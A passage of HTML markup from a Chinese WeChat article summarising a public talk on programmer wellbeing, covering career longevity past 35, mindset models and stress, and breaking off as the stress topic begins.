宋体;color:black;mso-font-kerning:0pt;">- 聚焦对程序员的<strong>关怀</strong>，很具体，有温度，不讨论宏大的问题。</span></p><p><span lang="EN-US" style="letter-spacing: 0.034em;font-size: 11pt;font-family: 微软雅黑, sans-serif;color: black;">- 老师们学贯中西，全球视野，创业体历，各有万千法门，点到为止。</span></p><p><span style="font-size: 12px;font-family: 微软雅黑, sans-serif;color: black;">*公开课很精彩，优先响应听众提问。我事后做笔记归纳了4个话题，和公开课直播的顺序出入较大。建议大家看回看，这是一堂感染力很强的幸福课。</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:
0pt;"><o:p></o:p></span></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.562962962962963" data-s="300,640" data-type="jpeg" data-w="1080" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=8ceac1b5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FFStUibflSINyhhPCLuiaNZibiahBb74nculTu9uqxaIBIHyx6nqeI41ZPyZ4OynvLOcREUGDCgmibOxiaZI8SVDMr2iaA%2F640%3Fwx_fmt%3Djpeg"/></p><p><br/></p><table cellspacing="0" cellpadding="0" title="" summary=""><tbody><tr style="mso-yfti-irow:0;mso-yfti-firstrow:yes;"><td width="341" valign="top" style="border-width: initial;border-style: none;border-color: initial;padding: 2pt 3pt;"><p style="text-align:left;mso-pagination:widow-orphan;"><strong><span style="font-size:20.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
  宋体;mso-font-kerning:0pt;">目录</span></strong><span lang="EN-US" style="font-size:20.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;mso-font-kerning:0pt;"><o:p></o:p></span></p></td></tr><tr style="mso-yfti-irow:1;mso-yfti-lastrow:yes;"><td width="341" valign="top" style="border-width: initial;border-style: none;border-color: initial;padding: 2pt 3pt;word-break: break-all;"><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">- </span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;mso-font-kerning:0pt;">话题1：可以一辈子做程序员么？<o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">    -  </span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;mso-font-kerning:0pt;">Michelle：美国程序员没有35岁危机<o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">    -  </span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;mso-font-kerning:0pt;">牛老师：研发工作的特点<o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">    -  </span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;mso-font-kerning:0pt;">Andy：职场人的心智模式<o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">    -  </span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;mso-font-kerning:0pt;">阿芹：学习逻辑层次，驾驶自己的列车<o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">    -  </span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;mso-font-kerning:0pt;">Andy：向内转，向前看<o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">- </span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;mso-font-kerning:0pt;">话题2：如何减压<o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">    -  </span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;mso-font-kerning:0pt;">Lisa：世界上没有那么多不得已<o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">    -  </span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;mso-font-kerning:0pt;">Michelle：我比原来有点进步就可以<o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">- </span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;mso-font-kerning:0pt;">话题3：如何码上幸福<o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">    -  </span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;mso-font-kerning:0pt;">阿芹：对码农建议<o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">    -  </span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;mso-font-kerning:0pt;">Michelle：幸福的方法<o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">    -  </span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;mso-font-kerning:0pt;">水哥：为自己做事，让自己更好<o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">    -  </span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;mso-font-kerning:0pt;">Lisa：SCRUM让从业者幸福快乐<o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">- </span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;mso-font-kerning:0pt;">话题4：基本功、新技术和幸福的关系<o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">    -  </span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;mso-font-kerning:0pt;">水哥：普适的十宝箱<o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">    -  </span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;mso-font-kerning:0pt;">Andy：开放心态拥抱新技术<o:p></o:p></span></p><p style="text-align:left;text-indent:14.0pt;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">-  </span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;mso-font-kerning:
  0pt;">阿芹：幸福员工组成企业生命体<o:p></o:p></span></p><p style="text-align:left;text-indent:14.0pt;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-family:&#34;微软雅黑 Light&#34;,sans-serif;color:black;">-  Michelle：愉悦心情 → 发挥创意</span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;mso-font-kerning:0pt;"><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">- </span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;mso-font-kerning:0pt;">附录<o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">    -  </span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;mso-font-kerning:0pt;">团队加班<o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">    -  </span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;mso-font-kerning:0pt;">什么时候把看板拆了<o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">    -  </span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;mso-font-kerning:0pt;">NLP逻辑层次<o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;"> <o:p></o:p></span></p></td></tr></tbody></table><p><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;"><o:p></o:p></span></p><p><strong><span style="font-size:16.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:#1E4E79;mso-font-kerning:18.0pt;">话题</span></strong><strong><span lang="EN-US" style="font-size:16.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
&#34;微软雅黑 Light&#34;;color:#1E4E79;mso-font-kerning:18.0pt;">1</span></strong><strong><span style="font-size:16.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:#1E4E79;mso-font-kerning:18.0pt;">：可以一辈子做程序员么？</span></strong><strong><span lang="EN-US" style="font-size:16.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:#1E4E79;mso-font-kerning:18.0pt;"><o:p></o:p></span></strong></p><p><strong><span lang="EN-US" style="font-size:14.0pt;font-family:
&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:&#34;微软雅黑 Light&#34;;color:#2E75B5;mso-font-kerning:0pt;">Michelle</span></strong><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:#2E75B5;mso-font-kerning:
0pt;">：美国程序员没有</span></strong><strong><span lang="EN-US" style="font-size:14.0pt;font-family:
&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:&#34;微软雅黑 Light&#34;;color:#2E75B5;mso-font-kerning:0pt;">35</span></strong><strong><span style="font-size:14.0pt;font-family:
&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:#2E75B5;mso-font-kerning:0pt;">岁危机</span></strong><strong><span lang="EN-US" style="font-size:14.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:#2E75B5;mso-font-kerning:0pt;"><o:p></o:p></span></strong></p><p><span style="color: black;font-family: 微软雅黑, sans-serif;font-size: 11pt;background-color: transparent;caret-color: var(--weui-BRAND);letter-spacing: 0.034em;">在美国，可以一辈子做编程，只要你喜欢；</span><span style="color: black;font-family: 微软雅黑, sans-serif;font-size: 15px;background-color: transparent;caret-color: var(--weui-BRAND);letter-spacing: 0.034em;">五六十岁还是程序员，在美国不是问题；你</span><span style="background-color: transparent;color: black;font-family: 微软雅黑, sans-serif;font-size: 11pt;letter-spacing: 0.034em;caret-color: var(--weui-BRAND);">可以不想管人，不想往上走，美国行得通。你可以有选择，技术上成为资深大牛，很受尊重，做自己喜欢的事情。</span></p><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">重要是自己提升、帮助别人，更关键是</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:#FA0000;mso-font-kerning:0pt;">看到工作的意义</span><span style="font-size:
11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">。<o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">好运老师评论：前提是不是</span><span style="font-size:
11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:#FA0000;mso-font-kerning:0pt;">真的热爱！</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:
0pt;"><o:p></o:p></span></p><p><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:#276296;mso-font-kerning:0pt;">牛老师：研发工作的特点<o:p></o:p></span></strong></p><p style="vertical-align: middle;"><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">虚拟化程度高、迭代快</span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;"><o:p></o:p></span></p><p style="vertical-align: middle;"><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">知识填充大、人际协作多、接受信息量大</span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;"><o:p></o:p></span></p><p style="vertical-align: middle;"><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">每个人出发点不一样，做事方式不一样</span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;"><o:p></o:p></span></p><p style="vertical-align: middle;"><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">思考多、痛苦多，希望拉开视角</span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;"><o:p></o:p></span></p><p><strong><span lang="EN-US" style="font-size:14.0pt;font-family:
&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:&#34;微软雅黑 Light&#34;;color:#2E75B5;mso-font-kerning:0pt;">Andy</span></strong><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:#2E75B5;mso-font-kerning:
0pt;">：职场人的心智模式</span></strong><strong><span lang="EN-US" style="font-size:14.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:#2E75B5;mso-font-kerning:0pt;"><o:p></o:p></span></strong></p><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">码农心智模式偏向于</span><span style="font-size: 11pt;font-family: 微软雅黑, sans-serif;text-decoration: underline;color: rgb(255, 0, 0);"><strong>规范主导</strong></span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">的人：崇尚专业，在意边界，很在意规则，尊重流程，尊重专家的意见。每个人应该做什么事情、人和人之间的合作模式是固定的。<o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">职场会尊重专业，但是</span><span style="font-size:
11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:#FA0000;mso-font-kerning:0pt;">职场不止是专业和规范。</span><span style="background-color: transparent;caret-color: var(--weui-BRAND);letter-spacing: 0.034em;font-size: 11pt;font-family: 微软雅黑, sans-serif;color: black;">规范主导和</span><span style="background-color: transparent;caret-color: var(--weui-BRAND);letter-spacing: 0.034em;text-decoration-line: underline;"><strong><span style="font-size: 11pt;font-family: 微软雅黑, sans-serif;color: rgb(255, 0, 0);">自主导向</span></strong></span><span style="background-color: transparent;caret-color: var(--weui-BRAND);letter-spacing: 0.034em;font-size: 11pt;font-family: 微软雅黑, sans-serif;color: black;">是有界限的。</span></p><p><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
微软雅黑;color:black;mso-font-kerning:0pt;">-规范主导：向外求，求助于外部规则，求助于外部环境，外部给他的力量<o:p></o:p></span></p><p><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
微软雅黑;color:black;mso-font-kerning:0pt;">-自主导向：向内求，我是谁，我追求什么<o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">有人问是否可以一辈子当程序员，程序员是职业、角色还是身份？需要进一步问“</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:#FA0000;mso-font-kerning:0pt;">你想成为什么样的人，你要追求的东西和程序员这个职业之间是什么关系</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">”？<o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">当你知道你想要什么的时候，当你知道你要的东西能够支撑起你是谁的时候，当你向内求去看自己的时候，很多问题就不是问题了，就会减少很多焦虑。<o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">想通上述问题，</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
&#34;微软雅黑 Light&#34;;color:black;mso-font-kerning:0pt;">996</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">或为之流出血和泪，也觉得是福报，否则</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
&#34;微软雅黑 Light&#34;;color:black;mso-font-kerning:0pt;">996</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">带来的一定是</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
&#34;微软雅黑 Light&#34;;color:black;mso-font-kerning:0pt;">ICU</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-ascii-font-family:
Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">。<o:p></o:p></span></p><p><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">Andy荐书：《领导者的意识进化》<o:p></o:p></span></p><p><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:#276296;mso-font-kerning:0pt;">阿芹：学习逻辑层次，驾驶自己的列车<o:p></o:p></span></strong></p><p><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">Andy老师根据小牛的信息，去观察，帮助向内觉察看见。<o:p></o:p></span></p><p><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">Andy老师肯定学过冰山理论、</span><span style="font-size: 11pt;font-family: 微软雅黑, sans-serif;color: rgb(255, 0, 0);">NLP逻辑层次</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:
0pt;">，知道思维模式是怎么形成的。<o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">工作是修心，和做什么事没太大关系。像扫地僧扫地扫着就开悟了，你修自己就可以。很多人纠结选择，到了一定层次</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:#FA0000;mso-font-kerning:0pt;">做什么事可能无关紧要，重要的是你以什么样的状态去做；可能你做任何事情，都能到达你的终极目标：合道、开悟、觉醒</span><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">。<o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">小牛的思维模式有好处，是一种框架。水哥在不同成长阶段，有不同的模式，驾驶着自己的列车。<o:p></o:p></span></p><p><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">* 阿芹的点评，建议参考附录的NLP逻辑层次<o:p></o:p></span></p><p><strong><span lang="EN-US" style="font-size:14.0pt;font-family:
&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:&#34;微软雅黑 Light&#34;;color:#2E75B5;mso-font-kerning:0pt;">Andy</span></strong><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:#2E75B5;mso-font-kerning:
0pt;">：向内转，向前看</span></strong><strong><span lang="EN-US" style="font-size:14.0pt;font-family:
&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:#2E75B5;mso-font-kerning:
0pt;"><o:p></o:p></span></strong></p><p style="vertical-align: middle;"><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">如果把写代码、做敏捷教练看做只是工作，到了</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
&#34;微软雅黑 Light&#34;;color:black;mso-font-kerning:0pt;">35</span><span style="font-size:
11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">岁天花板会焦虑。但是如果当成事业，就可以终身。</span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;"><o:p></o:p></span></p><p><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:#FA0000;mso-font-kerning:0pt;">在逻辑层次下三层（技能、行动、环境）上无解、在小环境里打转的问题，拉到上三层（愿景、身份、价值）、带我们看到整个系统，往往就容易解决了。更简单点，解决自我障碍的核心，是“向内转、向前看”。</span></p><p style="vertical-align: middle;"><strong><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">向内转</span></strong><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">，自己能做的事情是什么？预测未来需求，提前准备，不要向外求。</span></p><p style="vertical-align: middle;"><strong><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">向前看</span></strong><span style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:black;mso-font-kerning:0pt;">，把过往的东西全都抛掉，我们看到的是前方，我要达到什么程度、帮助人做什么、怎么成为更好的全人，这会带来内心深处的幸福。如果是别人、外界给你的幸福，你会挣扎很多。 <o:p></o:p></span></p><p><strong><span style="font-size:16.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:#1E4E79;mso-font-kerning:18.0pt;">话题</span></strong><strong><span lang="EN-US" style="font-size:16.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
&#34;微软雅黑 Light&#34;;color:#1E4E79;mso-font-kerning:18.0pt;">2</span></strong><strong><span style="font-size:16.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:#1E4E79;mso-font-kerning:18.0pt;">：如何减压</span></strong><strong><span lang="EN-US" style="font-size:16.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
宋体;color:#1E4E79;mso-font-kerning:18.0pt;"><o:p></o:p></span></strong></p><p><strong><span lang="EN-US" style="font-size:14.0pt;font-family:
&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:&#34;微软雅黑 Light&#34;;color:#2E75B5;mso-font-kerning:0pt;">Lisa</span></strong><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:#2E75B5;mso-font-kerning:
0pt;">：</span></strong><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
宋体;color:#2E75B5;mso-font-kerning:0pt;">世界上没有那么多不得已</span></strong><strong><span lang="EN-US" style="font-size:14.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:#2E75B5;mso-font-kerning:0pt;"><o:p></o:p></span></strong></p><p style="vertical-align: middle;"><span lang="EN-US" style="font-size:11.0pt;font-family:
